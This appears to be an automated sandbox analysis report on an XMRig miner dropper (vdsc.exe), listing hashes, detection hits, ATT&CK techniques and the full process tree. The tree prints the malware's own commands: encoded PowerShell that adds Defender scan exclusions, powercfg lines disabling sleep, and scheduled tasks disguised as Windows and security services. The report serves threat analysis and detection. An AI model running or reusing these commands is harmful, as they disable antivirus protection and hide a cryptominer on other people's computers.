xmrig | fe382c12a7de4e87f184cf400f190ebd9e7e49d5ae7673bae9df5f76ff23149a

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2023, 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vdsc.exe
Size

309KB
MD5

2a3823f5002b14a203fd3f2d6b5b6e53
SHA1

b90e9e1e66014944e7b6f0062f943d57a4106a29
SHA256

fe382c12a7de4e87f184cf400f190ebd9e7e49d5ae7673bae9df5f76ff23149a
SHA512

3e22014fc37d1d1645cee0f924101ba00cfebf40c6d51e1aba456dccc8e81a3ab2414b8fb596f0c5134a282210703075fde96593d9d319ec5adf9370af418e99
SSDEEP

6144:I7TbPC4xhavVTLvDVpH8Jbi9WqJFFK3ojNmTHWzW:I7TTlmTXVpH6CWqJTV4THWz

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/files/0x000600000002314c-323.dat	family_xmrig
behavioral2/files/0x000600000002314c-323.dat	xmrig
behavioral2/memory/3364-327-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-328-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-330-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-332-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-333-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-335-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3364-336-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 2 IoCs

pid	Process
4404	dllhost.exe
3364	winlogson.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2028 set thread context of 4656	2028	vdsc.exe	83

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1948	schtasks.exe
1980	schtasks.exe
2268	schtasks.exe
3456	schtasks.exe
3352	schtasks.exe
2596	schtasks.exe
3260	schtasks.exe
4244	schtasks.exe
3936	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4656	AppLaunch.exe
3808	powershell.exe
3808	powershell.exe
1844	powershell.exe
1844	powershell.exe
4624	powershell.exe
4624	powershell.exe
1304	powershell.exe
1304	powershell.exe
4688	powershell.exe
4688	powershell.exe
4272	powershell.exe
4272	powershell.exe
1844	powershell.exe
4624	powershell.exe
1304	powershell.exe
4688	powershell.exe
4272	powershell.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe
4404	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	4656	AppLaunch.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeShutdownPrivilege	2820	powercfg.exe
Token: SeCreatePagefilePrivilege	2820	powercfg.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeShutdownPrivilege	4240	powercfg.exe
Token: SeCreatePagefilePrivilege	4240	powercfg.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeShutdownPrivilege	4600	powercfg.exe
Token: SeCreatePagefilePrivilege	4600	powercfg.exe
Token: SeShutdownPrivilege	4832	powercfg.exe
Token: SeCreatePagefilePrivilege	4832	powercfg.exe
Token: SeShutdownPrivilege	776	powercfg.exe
Token: SeCreatePagefilePrivilege	776	powercfg.exe
Token: SeShutdownPrivilege	776	powercfg.exe
Token: SeCreatePagefilePrivilege	776	powercfg.exe
Token: SeDebugPrivilege	4404	dllhost.exe
Token: SeLockMemoryPrivilege	3364	winlogson.exe
Token: SeLockMemoryPrivilege	3364	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3364	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 4656	2028	vdsc.exe	83
PID 2028 wrote to memory of 4656	2028	vdsc.exe	83
PID 2028 wrote to memory of 4656	2028	vdsc.exe	83
PID 2028 wrote to memory of 4656	2028	vdsc.exe	83
PID 2028 wrote to memory of 4656	2028	vdsc.exe	83
PID 4656 wrote to memory of 1040	4656	AppLaunch.exe	84
PID 4656 wrote to memory of 1040	4656	AppLaunch.exe	84
PID 4656 wrote to memory of 1040	4656	AppLaunch.exe	84
PID 1040 wrote to memory of 3808	1040	cmd.exe	86
PID 1040 wrote to memory of 3808	1040	cmd.exe	86
PID 1040 wrote to memory of 3808	1040	cmd.exe	86
PID 4656 wrote to memory of 4404	4656	AppLaunch.exe	93
PID 4656 wrote to memory of 4404	4656	AppLaunch.exe	93
PID 4656 wrote to memory of 4404	4656	AppLaunch.exe	93
PID 4656 wrote to memory of 1216	4656	AppLaunch.exe	122
PID 4656 wrote to memory of 1216	4656	AppLaunch.exe	122
PID 4656 wrote to memory of 1216	4656	AppLaunch.exe	122
PID 4656 wrote to memory of 3836	4656	AppLaunch.exe	121
PID 4656 wrote to memory of 3836	4656	AppLaunch.exe	121
PID 4656 wrote to memory of 3836	4656	AppLaunch.exe	121
PID 4656 wrote to memory of 2140	4656	AppLaunch.exe	120
PID 4656 wrote to memory of 2140	4656	AppLaunch.exe	120
PID 4656 wrote to memory of 2140	4656	AppLaunch.exe	120
PID 4656 wrote to memory of 684	4656	AppLaunch.exe	119
PID 4656 wrote to memory of 684	4656	AppLaunch.exe	119
PID 4656 wrote to memory of 684	4656	AppLaunch.exe	119
PID 4656 wrote to memory of 3444	4656	AppLaunch.exe	118
PID 4656 wrote to memory of 3444	4656	AppLaunch.exe	118
PID 4656 wrote to memory of 3444	4656	AppLaunch.exe	118
PID 4656 wrote to memory of 2032	4656	AppLaunch.exe	117
PID 4656 wrote to memory of 2032	4656	AppLaunch.exe	117
PID 4656 wrote to memory of 2032	4656	AppLaunch.exe	117
PID 4656 wrote to memory of 3764	4656	AppLaunch.exe	116
PID 4656 wrote to memory of 3764	4656	AppLaunch.exe	116
PID 4656 wrote to memory of 3764	4656	AppLaunch.exe	116
PID 4656 wrote to memory of 1600	4656	AppLaunch.exe	115
PID 4656 wrote to memory of 1600	4656	AppLaunch.exe	115
PID 4656 wrote to memory of 1600	4656	AppLaunch.exe	115
PID 4656 wrote to memory of 5056	4656	AppLaunch.exe	114
PID 4656 wrote to memory of 5056	4656	AppLaunch.exe	114
PID 4656 wrote to memory of 5056	4656	AppLaunch.exe	114
PID 4656 wrote to memory of 4992	4656	AppLaunch.exe	113
PID 4656 wrote to memory of 4992	4656	AppLaunch.exe	113
PID 4656 wrote to memory of 4992	4656	AppLaunch.exe	113
PID 4656 wrote to memory of 4408	4656	AppLaunch.exe	112
PID 4656 wrote to memory of 4408	4656	AppLaunch.exe	112
PID 4656 wrote to memory of 4408	4656	AppLaunch.exe	112
PID 4656 wrote to memory of 3228	4656	AppLaunch.exe	111
PID 4656 wrote to memory of 3228	4656	AppLaunch.exe	111
PID 4656 wrote to memory of 3228	4656	AppLaunch.exe	111
PID 4656 wrote to memory of 4996	4656	AppLaunch.exe	110
PID 4656 wrote to memory of 4996	4656	AppLaunch.exe	110
PID 4656 wrote to memory of 4996	4656	AppLaunch.exe	110
PID 4656 wrote to memory of 2640	4656	AppLaunch.exe	94
PID 4656 wrote to memory of 2640	4656	AppLaunch.exe	94
PID 4656 wrote to memory of 2640	4656	AppLaunch.exe	94
PID 3228 wrote to memory of 1844	3228	cmd.exe	103
PID 3228 wrote to memory of 1844	3228	cmd.exe	103
PID 3228 wrote to memory of 1844	3228	cmd.exe	103
PID 4408 wrote to memory of 4624	4408	cmd.exe	123
PID 4408 wrote to memory of 4624	4408	cmd.exe	123
PID 4408 wrote to memory of 4624	4408	cmd.exe	123
PID 2640 wrote to memory of 2820	2640	cmd.exe	125
PID 2640 wrote to memory of 2820	2640	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\vdsc.exe
"C:\Users\Admin\AppData\Local\Temp\vdsc.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHIASgBPADMARwBpAHMAUQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMABOAHIATAAxAFEATgBzAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAQwBpAEwAUQBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwBLAGUAcgBaAHoAQQBOACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAHIASgBPADMARwBpAHMAUQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMABOAHIATAAxAFEATgBzAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAQwBpAEwAUQBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwBLAGUAcgBaAHoAQQBOACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3808
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4076
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:3224
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo 9ugMsQFЯОмl & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Nb
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2820
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4240
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4600
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4832
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:776
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACoERgB0AHoAHgQwBDIAdQBtAGIAZQBWADAEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAzBEsANgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwAzBEsETgATBCIEHQQVBCEEJgQgBGIAIwA+ACAAQAAoACAAPAAjAEQEUwBNBCoELAQoBEYEOAQWBFkASABpACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBrAGwARwQqBDQAHwQxAEoAQgQ2AEUAOgQ0AHgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAG4ANgRNBEkAawBGADQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAIQRJACMAPgA="
    3⤵
    PID:4996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACoERgB0AHoAHgQwBDIAdQBtAGIAZQBWADAEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAzBEsANgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwAzBEsETgATBCIEHQQVBCEEJgQgBGIAIwA+ACAAQAAoACAAPAAjAEQEUwBNBCoELAQoBEYEOAQWBFkASABpACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBrAGwARwQqBDQAHwQxAEoAQgQ2AEUAOgQ0AHgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAG4ANgRNBEkAawBGADQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAIQRJACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHUARARlAGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUADwETwRBADIAMQQjBDAANAAwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBXABAETgAtBEYANgARBEYEeABBAHkAIwA+ACAAQAAoACAAPAAjADcETgRwABUEGgRGAFQAVgAmBFcAZAA4AE8EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEgAbAAeBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBnAG0AKAQ1BFQAQwRPBEQAGAQ8BDIENQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAxAHUAHwRvADcATQAhBBEEdQBrAGYAJwRhACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3228
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADIEOAQzBBsEcwA2AEMAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATAROAG0ATgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPAQvBEYEPAQgBCIEVwA5ACMAPgAgAEAAKAAgADwAIwA1BHQATQBjACcEQwRxADwETwROBGYAHQQ5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAaBC8ENgA1BBgEHQRZADYEKgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAGgQ4ADoEPwQ6BDYAMwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDABkEVgARBHUAIwA+AA=="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADIEOAQzBBsEcwA2AEMAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATAROAG0ATgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPAQvBEYEPAQgBCIEVwA5ACMAPgAgAEAAKAAgADwAIwA1BHQATQBjACcEQwRxADwETwROBGYAHQQ5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAaBC8ENgA1BBgEHQRZADYEKgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAGgQ4ADoEPwQ6BDYAMwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDABkEVgARBHUAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4624
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEQAaQAxADsEUgBTAFkAIgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEAMQBtAEUEMgQ0ADMALQRGBGwAMQBHACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAYBEcAFgQjAD4AIABAACgAIAA8ACMARwA0BCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBkAFkAFgRZAEEEPgRpABwEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACIEJwRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcANQBxAEIAUwAjAD4A"
    3⤵
    PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEQAaQAxADsEUgBTAFkAIgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEAMQBtAEUEMgQ0ADMALQRGBGwAMQBHACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAYBEcAFgQjAD4AIABAACgAIAA8ACMARwA0BCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBkAFkAFgRZAEEEPgRpABwEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACIEJwRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcANQBxAEIAUwAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADAEZQBABCUEcwAnBHIAOARHBEsEPgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAQgBABCQEGARJACUERAAfBEwATgRuADAERABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBYACYEOABKBBcEQQQXBFgAIQQ3ACMAPgAgAEAAKAAgADwAIwAmBCkEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABwEVwA4BDsEOQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdQBMAHgAEARxAFYAGgROAEwAOgRBABYEEwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOAC0EcABoAHMANgBZAEUAHgQjAD4A"
    3⤵
    PID:5056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADAEZQBABCUEcwAnBHIAOARHBEsEPgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAQgBABCQEGARJACUERAAfBEwATgRuADAERABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBYACYEOABKBBcEQQQXBFgAIQQ3ACMAPgAgAEAAKAAgADwAIwAmBCkEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABwEVwA4BDsEOQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdQBMAHgAEARxAFYAGgROAEwAOgRBABYEEwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOAC0EcABoAHMANgBZAEUAHgQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4688
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo адdНrs & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Иа
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3936
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Яь5DРvVеДпг2S21ъ & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo xмСЧоБ
    3⤵
    PID:3764
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo кE & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo CwYулh1H6еx
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo в9Г7гЦli & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:3444
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3456
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo яЫщ
    3⤵
    PID:684
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ХТxэ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo CШ7wCAе
    3⤵
    PID:2140
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo QдauЯБGhФDkOD & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:3836
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo jPlМЙPД6AоQпE & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo о
    3⤵
    PID:1216
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHUARARlAGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUADwETwRBADIAMQQjBDAANAAwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBXABAETgAtBEYANgARBEYEeABBAHkAIwA+ACAAQAAoACAAPAAjADcETgRwABUEGgRGAFQAVgAmBFcAZAA4AE8EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEgAbAAeBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBnAG0AKAQ1BFQAQwRPBEQAGAQ8BDIENQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAxAHUAHwRvADcATQAhBBEEdQBrAGYAJwRhACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
